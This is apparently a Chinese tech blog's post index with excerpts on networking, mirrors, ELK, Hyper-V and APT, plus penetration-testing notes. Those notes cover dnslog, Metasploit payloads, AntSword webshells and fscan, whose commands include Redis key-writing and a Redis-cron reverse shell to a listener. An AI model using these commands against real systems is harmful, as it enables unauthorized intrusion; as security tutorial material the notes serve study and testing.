tailscale 是一款基于 Wireguard 的开源组网软件，可以通过服务器实现中继或打洞 打洞成功后可以直接走 P2P，避免浪费服务器带宽 但是在某些情况下，使用官方服务器打洞成功率较低，而且在恶劣网络情况下，官方服务器的中继效果较差，所以我自己部署了多个 derp，以实现高可用的打洞和中继服务。 官方对 DerpServer 的介绍 如何自定义自己的 Derp 但是在这里我使用 docker 方便快速部署，因为机器有点多，懒得一个去装 XD Derp 部署 version: '3.7' services: derper: image: fredliang/derper ports: - "60080:80" - "60443:443" - "3478:34…

最近在写项目，发现我要下载的东西怎么啥都被 GFW 了（github 源码和发布文件 /docker 镜像 /go 工具链等） 镜像源没有，加速站没有，仅存几个可用的被边写边封，后来决定自己写了个反向代理的镜像站供工程使用 正文有提供给读者测试的一个小站，也可以用作小型生产环境，我自己已经完全依赖自己的镜像源了，尽可能维持稳定吧，要是炸了我服务 SLA 也炸了 ...

关于 ELK 以及其优势 简单 GPT 一下 ELK 是 Elasticsearch、Logstash 和 Kibana 三个开源项目的首字母缩写，通常一起使用构成一个强大的日志管理和分析解决方案。下面将介绍它们各自的功能和 ELK 的优势： - Elasticsearch: 是一个基于 Lucene 构建的高性能搜索引擎。 主要用于全文搜索和分析。 具有高伸缩性，可以水平扩展，并且能够快速处理大量数据。 - Logstash: 是一个强大的数据处理管道工具。 能够动态地收集、处理和转发日志和事件数据。 支持多种输入、过滤、编解码和输出插件。 - Kibana: 是一个为 Elasticsearch 提供数据可视化的 Web 应用程序。 允许用户创建和分…

首先我们要搞清楚一个问题，Wireguard 和 OpenVPN 的区别在哪里 Wireguard 基于 UDP 协议，继承于内核中，由于加密协议简单（但安全），开销较小，性能较高 OpenVPN 基于 TCP 或 UDP 协议，由 SSL/TLS 实现身份加密，没有 Wireguard 效率高，但是支持多种管理方式 在实际使用上，TCP 和 UDP 也有较大区别 TCP：可以提供更可靠的连接，因为它具有确认和重传机制，能够处理丢包和错误。适用于对数据完整性和可靠性要求较高的场景。 UDP：UDP 可以提供更快的速度和较低的延迟，适用于实时应用程序和视频流等对延迟敏感的情况。UDP 模式还可以避免 TCP 拥塞控制的限制，适用于高带宽环境 UDP 在实际使用上可能会被 QOS 限速，但是在长…

Hyper-V Hyper-V，代号 Viridian，旧称 Windows Server Virtualization，是 Microsoft 的本地虚拟机管理程序，它可以在运行 x86-64 位的 Windows 上创建虚拟机。从 Windows 8 开始，Hyper-V 取代 Windows Virtual PC 作为 Windows 客户端版本的硬件虚拟化组件。可以配置运行 Hyper-V 的服务器计算机能够将单个虚拟机公开到一个或多个网络。Hyper-V 是与 Windows Server 2008 一起首次发布，自 Windows Server 2012 和 Windows 8 以来一直无需额外付费。独立的 Windows Hyper-V Server 是免费的，但仅具有命令行接口…

引言 最近在折腾自己学校的镜像源，看到差不多 20T 的硬盘都被塞满了，我是很好奇系统是如何管理这些文件的，于是顺便就研究下 APT 源的工作原理 原理 在 Ubuntu/Debian 等系统下，常见的应用安装方式为 apt/apt-get 前者可以说是后者的升级版，提供了更友好的命令行界面，包含了 apt-get 和 apt-cache 等常用功能，本质上都是基于 dpkg 的高级包管理工具。 Ubuntu/Debian 采用集中式的软件仓库机制，将各式各样的软件包分门别类地存放在软件仓库中，进行有效地组织和管理。由于网络环境的问题，我们可能无法正常访问官方的软件仓库，所以许多镜像服务器被建立，并且时刻保持与官方服务器的同步。在使用 apt 之前，我们一般都会进行换源处理…

Dnslog 相信渗透的都不陌生，但我只是在 Apache Log4j 后才意识到这东西是有多好用 但是有些时候，知名的 dnslog.cn 网站就会崩溃。 既然这样，干脆就自己搭一个，但是过程十分艰辛。 由于我设置了 @* 解析，我就不需要再对 ns1.xxx.cn/ns2.xxx.cn 进行解析 具体如下 然后我们就接着物色 dnslog 平台 一个非常古老的 BugScanTeam 的 DNSLOG 于是乎，调了好久，6 年前的代码，还要改 cdn，还要改 ssl（开发组历史遗留问题） 最后改完了，发现一直 301，查看 issue 才发现要修改 SECURE_SSL_REDIRECT = False 然而，无论怎么修改数据库，还是进不去他的管理界面！ 之后只好另谋出路，最后…

Metasploit 一款开源安全漏洞检测工具，其不断更新的 Payload 使其成为了最强大的渗透框架之一 对于 MSFCONSOLE（简称 MSF），就不多赘述安装部署了，对于日常渗透使用一般可以再 Viper 中使用。 常见参数解读： -p, –payload <payload> 指定需要使用的 payload (攻击荷载)。也可以使用自定义 payload, 几乎是支持全平台的 -l, –list [module_type] 列出指定模块的所有可用资源。模块类型包括: payloads, encoders, nops, all -n, –nopsled < length> 为 payload 预先指定一个 NOP 滑动长度 -f, –format < form…

Github 仓库 蚁剑官方加载器 这是一款 Webshell 管理的基础软件，渗透的一切都是围绕 shell 进行的，内置的插件也能解决一些小问题 附一张成功 webshell 的截图 连接密码对应 webshell 的 POST 参数

Github 仓库 Fscan 是一款内网综合扫描工具，以下为常用命令 fscan -h 0.0.0.0/8 (全网段扫描) fscan -h 192.168.1.1/24 (默认使用全部模块) fscan -h 192.168.1.1/16 (B 段扫描) 其他用法 fscan -h 192.168.1.1/24 -np -no -nopoc (跳过存活检测 、不保存文件、跳过 web poc 扫描) fscan -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥) fscan -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹 shell) fscan -h 19…